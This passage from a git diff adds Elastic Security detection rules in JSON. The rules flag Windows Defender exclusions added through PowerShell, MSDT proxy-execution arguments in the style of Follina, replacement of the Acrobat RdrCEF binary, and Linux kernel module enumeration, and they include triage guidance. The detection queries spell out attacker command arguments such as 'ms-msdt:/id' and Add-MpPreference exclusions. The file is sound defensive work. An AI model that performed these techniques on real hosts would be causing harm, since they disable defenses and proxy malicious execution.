Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", + "references": [ + "https://twitter.com/pabraeken/status/997997818362155008" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.010", + "name": "Services File Permissions Weakness", + "reference": "https://attack.mitre.org/techniques/T1574/010/" + } + ] + }, + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "2bf78aa2-9c56-48de-b139-f169bf99cf86_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_109.json b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_109.json new file mode 100644 index 00000000000..9c4cab2e24a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_109.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the Windows Defender configuration settings using PowerShell to add exclusions at the folder directory or process level.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Defender Exclusions Added via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Exclusions Added via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows. Since this software product is used to prevent and stop malware, it's important to monitor what specific exclusions are made to the product's configuration settings. These can often be signs of an adversary or malware trying to bypass Windows Defender's capabilities. One of the more notable [examples](https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/) was observed in 2018 where Trickbot incorporated mechanisms to disable Windows Defender to avoid detection.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the exclusion in order to determine the intent behind it.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- If the exclusion specifies a suspicious file or path, retrieve the file(s) and determine if malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives due to how often network administrators legitimately configure exclusions. In order to validate the activity further, review the specific exclusion and its intent. There are many legitimate reasons for exclusions, so it's important to gain context.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Exclusion lists for antimalware capabilities should always be routinely monitored for review.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name in (\"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\")) and\n process.args : (\"*Add-MpPreference*\", \"*Set-MpPreference*\") and\n process.args : (\"*-Exclusion*\")\n", + "references": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_110.json b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_110.json new file mode 100644 index 00000000000..25a8b7fbd28 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2c17e5d7-08b9-43b2-b58a-0270d65ac85b_110.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the Windows Defender configuration settings using PowerShell to add exclusions at the folder directory or process level.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Defender Exclusions Added via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Exclusions Added via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows. Since this software product is used to prevent and stop malware, it's important to monitor what specific exclusions are made to the product's configuration settings. These can often be signs of an adversary or malware trying to bypass Windows Defender's capabilities. One of the more notable [examples](https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/) was observed in 2018 where Trickbot incorporated mechanisms to disable Windows Defender to avoid detection.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the exclusion in order to determine the intent behind it.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- If the exclusion specifies a suspicious file or path, retrieve the file(s) and determine if malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives due to how often network administrators legitimately configure exclusions. In order to validate the activity further, review the specific exclusion and its intent. There are many legitimate reasons for exclusions, so it's important to gain context.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Exclusion lists for antimalware capabilities should always be routinely monitored for review.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name in (\"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\")) and\n process.args : (\"*Add-MpPreference*\", \"*Set-MpPreference*\") and\n process.args : (\"*-Exclusion*\")\n", + "references": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2c17e5d7-08b9-43b2-b58a-0270d65ac85b_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_108.json b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_108.json new file mode 100644 index 00000000000..48ae884abfd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_108.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential abuse of the Microsoft Diagnostics Troubleshooting Wizard (MSDT) to proxy malicious command or binary execution via malicious process arguments.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Microsoft Diagnostics Wizard Execution", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.pe.original_file_name == \"msdt.exe\" or process.name : \"msdt.exe\") and\n (\n process.args : (\"IT_RebrowseForFile=*\", \"ms-msdt:/id\", \"ms-msdt:-id\", \"*FromBase64*\") or\n\n (process.args : \"-af\" and process.args : \"/skip\" and\n process.parent.name : (\"explorer.exe\", \"cmd.exe\", \"powershell.exe\", \"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"rundll32.exe\", \"regsvr32.exe\") and\n process.args : (\"?:\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml\", \"PCWDiagnostic.xml\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\Windows\\\\Temp\\\\*\")) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.name : \"msdt.exe\" and process.name != null) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.executable : (\"?:\\\\Windows\\\\system32\\\\msdt.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msdt.exe\"))\n )\n", + "references": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_109.json b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_109.json new file mode 100644 index 00000000000..07a79e01357 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_109.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential abuse of the Microsoft Diagnostics Troubleshooting Wizard (MSDT) to proxy malicious command or binary execution via malicious process arguments.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Microsoft Diagnostics Wizard Execution", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.pe.original_file_name == \"msdt.exe\" or process.name : \"msdt.exe\") and\n (\n process.args : (\"IT_RebrowseForFile=*\", \"ms-msdt:/id\", \"ms-msdt:-id\", \"*FromBase64*\") or\n\n (process.args : \"-af\" and process.args : \"/skip\" and\n process.parent.name : (\"explorer.exe\", \"cmd.exe\", \"powershell.exe\", \"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"rundll32.exe\", \"regsvr32.exe\") and\n process.args : (\"?:\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml\", \"PCWDiagnostic.xml\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\Windows\\\\Temp\\\\*\")) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.name : \"msdt.exe\" and process.name != null) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.executable : (\"?:\\\\Windows\\\\system32\\\\msdt.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msdt.exe\"))\n )\n", + "references": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_209.json b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_209.json new file mode 100644 index 00000000000..eafbd5a740a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2d8043ed-5bda-4caf-801c-c1feb7410504_209.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module.", + "false_positives": [ + "Security tools and device drivers may run these programs in order to enumerate kernel modules. Use of these programs by ordinary users is uncommon. These can be exempted by process name or username." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Enumeration of Kernel Modules", + "new_terms_fields": [ + "process.parent.command_line", + "process.command_line", + "host.id" + ], + "query": "event.category:process and host.os.type:linux and event.type:start and event.action:(exec or exec_event) and (\n (process.name:(lsmod or modinfo)) or \n (process.name:kmod and process.args:list) or \n (process.name:depmod and process.args:(--all or -a))\n) and not process.parent.name:(mkinitramfs or cryptroot or framebuffer or dracut or jem or thin-provisioning-tools\nor readykernel or lvm2 or vz-start or iscsi or mdadm or ovalprobes or bcache or plymouth or dkms or overlayroot or \nweak-modules or zfs)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2d8043ed-5bda-4caf-801c-c1feb7410504", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 209 + }, + "id": "2d8043ed-5bda-4caf-801c-c1feb7410504_209", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_211.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_211.json new file mode 100644 index 00000000000..1bcc8d6f4ff --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_211.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": 